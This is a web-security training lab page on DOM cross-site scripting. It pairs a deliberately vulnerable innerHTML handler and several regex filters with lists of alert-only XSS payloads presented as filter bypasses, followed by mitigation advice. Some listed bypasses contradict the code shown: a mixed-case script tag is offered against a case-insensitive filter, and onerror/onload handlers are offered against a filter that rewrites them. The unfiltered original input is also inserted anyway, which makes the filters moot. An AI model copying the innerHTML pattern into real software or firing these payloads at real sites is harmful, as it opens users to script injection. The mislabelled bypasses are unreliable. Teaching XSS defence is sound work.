Lab 5: Advanced DOM XSS with Filters

Difficulty: High

Lab Overview

This lab demonstrates advanced DOM XSS vulnerabilities where various filtering mechanisms are implemented but can be bypassed. The application applies different filters to user input but still allows XSS through creative bypass techniques.

Objective: Bypass the implemented filters and inject DOM XSS payloads that will execute despite the security measures.

Vulnerable JavaScript Code

// Multiple filter implementations
function applyFilters(input, filterType) {
    switch(filterType) {
        case 'script_tag':
            // Filter: Block script tags
            return input.replace(/<script[^>]*>.*?<\/script>/gi, '[BLOCKED]');
            
        case 'event_handlers':
            // Filter: Block event handlers
            return input.replace(/on\w+\s*=/gi, 'blocked_');
            
        case 'javascript_protocol':
            // Filter: Block javascript: protocol
            return input.replace(/javascript:/gi, 'blocked_javascript:');
            
        case 'case_sensitive':
            // Filter: Case-sensitive blocking
            return input.replace(/<script>/g, '[BLOCKED]');
            
        case 'double_encode':
            // Filter: Basic double encoding detection
            if (input.includes('%')) {
                return '[ENCODING DETECTED]';
            }
            return input;
            
        default:
            return input;
    }
}

// Vulnerable processing function
function processInput() {
    var input = document.getElementById('userInput').value;
    var filterType = document.getElementById('filterType').value;
    
    // Apply filter
    var filteredInput = applyFilters(input, filterType);
    
    // Vulnerable: Still using innerHTML
    document.getElementById('output').innerHTML = 
        '<div class="result">' +
        '<h3>Filtered Input:</h3>' +
        '<p>' + filteredInput + '</p>' +
        '<h3>Original Input:</h3>' +
        '<p>' + input + '</p>' +
        '</div>';
}

Live Demo

Filtered Output:

Bypass Examples:

Try these payloads with different filters:

<ScRiPt>alert('XSS')</ScRiPt> - Case bypass
<img src=x onerror=alert('XSS')> - Event handler bypass
<svg onload=alert('XSS')> - SVG bypass
<iframe src="javascript:alert('XSS')"></iframe> - Protocol bypass

Vulnerability Details

Type: Advanced DOM XSS with Filter Bypasses
Severity: Critical
Source: User input with various filters
Sink: innerHTML
Trigger: Filter bypass techniques
Issue: Inadequate filtering mechanisms

Bypass Payloads by Filter

Script Tag Filter Bypasses:

<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

Event Handlers Filter Bypasses:

<img src=x onerror=alert('XSS')>
<body onload=alert('XSS')>
<svg onload=alert('XSS')>

JavaScript Protocol Filter Bypasses:

<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>

Advanced Attack Scenarios

Bypassing WAF and security filters
Advanced social engineering attacks
Protocol confusion attacks
Encoding-based filter evasion
Context-aware XSS attacks
Client-side security control bypasses
Multi-stage payload delivery

Advanced Mitigation Strategies

Use textContent instead of innerHTML
Implement multiple layers of validation and sanitization
Use whitelist-based validation instead of blacklists
Normalize and canonicalize input before validation
Implement proper context-aware output encoding
Use Content Security Policy (CSP) headers
Regular security testing and filter updates
Consider using a WAF (Web Application Firewall)
Implement proper input validation libraries